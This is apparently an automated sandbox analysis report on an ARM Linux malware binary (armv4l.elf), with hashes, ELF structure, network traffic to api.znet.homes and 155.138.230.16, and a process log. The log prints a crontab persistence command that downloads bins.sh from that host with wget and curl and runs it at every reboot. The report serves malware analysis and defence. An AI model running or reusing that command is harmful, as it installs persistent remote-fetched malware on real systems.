                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      Process:/tmp/armv4l.elf
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):2.70870089846184
                      Encrypted:false
                      SSDEEP:3:FWOKBE+v2ETUdVvX:qBFYdVf
                      MD5:C68F115028521D1F27D2B75AD23ECEE9
                      SHA1:F17B6874007936B80B203633260C64CE626093F2
                      SHA-256:50766FFEFBBFD3910C3E15CC8B8955C61EB758A40A65F31F0645D3EE52195546
                      SHA-512:FDF037C39D572E1B47449B13E82B10FBC10D054D4AA44BA5444422F60397EBB22A1DE62965261FDA4AE0785C657CDD25915DFE2EE99BF529453E28B061E0E991
                      Malicious:false
                      Preview:5533 (/tmp/armv4l.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                      File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                      Entropy (8bit):6.134408421992252
                      TrID:
                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                      File name:armv4l.elf
                      File size:86'760 bytes
                      MD5:07a767893b5a40d37a82956f0c68f9f5
                      SHA1:38e6dbf0fd93d59c81ca89f465b63cdf069639c3
                      SHA256:3322b9935b9a4af99331cc75beed48f2cffbe98ae2bc6d23fffcc832ce9738e1
                      SHA512:7e48e5638d2a2e5e4f5a4b21553691ecdedc37a65e4bf9c268371474b57af731ccaf041cea7fff3db1fb48d794a0dd4b8a0a9d6a3a402b710418d5e4ad02470a
                      SSDEEP:1536:p0NXI0QqKOUVSuGQJ9msaTTyWnnzOmrJXCvJHOZwlB3FDVkyPQzBD0Nzv7sX:uNY0QqKrVSIWJT7S0XCvdQm9FDVkgQzd
                      TLSH:B6831956B9528A03C5D312B6FBEE418937167BB8D3EA3102CD21AF9133865DB1D7B213
                      File Content Preview:.ELF...a..........(.........4....P......4. ...(.....................D;..D;...............@...@...@.......h..........Q.td..................................-...L."....H..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                      ELF header

                      Class:ELF32
                      Data:2's complement, little endian
                      Version:1 (current)
                      Machine:ARM
                      Version Number:0x1
                      Type:EXEC (Executable file)
                      OS/ABI:ARM - ABI
                      ABI Version:0
                      Entry Point Address:0x8190
                      Flags:0x202
                      ELF Header Size:52
                      Program Header Offset:52
                      Program Header Size:32
                      Number of Program Headers:3
                      Section Header Offset:86240
                      Section Header Size:40
                      Number of Section Headers:13
                      Header String Table Index:12
                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                      NULL0x00x00x00x00x0000
                      .initPROGBITS0x80940x940x180x00x6AX004
                      .textPROGBITS0x80b00xb00x122f80x00x6AX0016
                      .finiPROGBITS0x1a3a80x123a80x140x00x6AX004
                      .rodataPROGBITS0x1a3bc0x123bc0x17880x00x2A004
                      .eh_framePROGBITS0x240000x140000x40x00x3WA004
                      .ctorsPROGBITS0x240040x140040x80x00x3WA004
                      .dtorsPROGBITS0x2400c0x1400c0x80x00x3WA004
                      .jcrPROGBITS0x240140x140140x40x00x3WA004
                      .dataPROGBITS0x240180x140180x2a40x00x3WA004
                      .bssNOBITS0x242bc0x142bc0x66380x00x3WA004
                      .commentPROGBITS0x00x142bc0xdcc0x00x0001
                      .shstrtabSTRTAB0x00x150880x560x00x0001
                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                      LOAD0x00x80000x80000x13b440x13b446.14600x5R E0x8000.init .text .fini .rodata
                      LOAD0x140000x240000x240000x2bc0x68f43.84170x6RW 0x8000.eh_frame .ctors .dtors .jcr .data .bss
                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                      Download Network PCAP: filteredfull

                      • Total Packets: 9
                      • 80 (HTTP)
                      • 53 (DNS)
                      TimestampSource PortDest PortSource IPDest IP
                      Mar 23, 2025 23:08:07.848648071 CET4891080192.168.2.15155.138.230.16
                      Mar 23, 2025 23:08:08.853285074 CET4891080192.168.2.15155.138.230.16
                      Mar 23, 2025 23:08:10.869237900 CET4891080192.168.2.15155.138.230.16
                      Mar 23, 2025 23:08:14.933109999 CET4891080192.168.2.15155.138.230.16
                      Mar 23, 2025 23:08:23.125165939 CET4891080192.168.2.15155.138.230.16
                      Mar 23, 2025 23:08:39.252326965 CET4891080192.168.2.15155.138.230.16
                      Mar 23, 2025 23:09:12.275250912 CET4891080192.168.2.15155.138.230.16
                      TimestampSource PortDest PortSource IPDest IP
                      Mar 23, 2025 23:08:06.388411045 CET4875253192.168.2.151.1.1.1
                      Mar 23, 2025 23:08:06.508167028 CET53487521.1.1.1192.168.2.15
                      Mar 23, 2025 23:09:06.520133972 CET6064053192.168.2.151.1.1.1
                      Mar 23, 2025 23:09:06.640310049 CET53606401.1.1.1192.168.2.15
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 23, 2025 23:08:06.388411045 CET192.168.2.151.1.1.10x4bcfStandard query (0)api.znet.homesA (IP address)IN (0x0001)false
                      Mar 23, 2025 23:09:06.520133972 CET192.168.2.151.1.1.10x56baStandard query (0)api.znet.homesA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 23, 2025 23:08:06.508167028 CET1.1.1.1192.168.2.150x4bcfNo error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                      Mar 23, 2025 23:09:06.640310049 CET1.1.1.1192.168.2.150x56baNo error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false

                      System Behavior

                      Start time (UTC):22:07:59
                      Start date (UTC):23/03/2025
                      Path:/tmp/armv4l.elf
                      Arguments:/tmp/armv4l.elf
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:07:59
                      Start date (UTC):23/03/2025
                      Path:/tmp/armv4l.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:07:59
                      Start date (UTC):23/03/2025
                      Path:/tmp/armv4l.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/tmp/armv4l.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/tmp/armv4l.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/tmp/armv4l.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/usr/bin/crontab
                      Arguments:crontab -l
                      File size:43720 bytes
                      MD5 hash:66e521d421ac9b407699061bf21806f5

                      Start time (UTC):22:08:06
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:06
                      Start date (UTC):23/03/2025
                      Path:/usr/bin/chmod
                      Arguments:chmod +x bins.sh
                      File size:63864 bytes
                      MD5 hash:739483b900c045ae1374d6f53a86a279

                      Start time (UTC):22:08:06
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:06
                      Start date (UTC):23/03/2025
                      Path:/usr/bin/sh
                      Arguments:sh bins.sh
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:06
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:06
                      Start date (UTC):23/03/2025
                      Path:/bin/curl
                      Arguments:/bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
                      File size:239848 bytes
                      MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:08:05
                      Start date (UTC):23/03/2025
                      Path:/usr/bin/crontab
                      Arguments:crontab -
                      File size:43720 bytes
                      MD5 hash:66e521d421ac9b407699061bf21806f5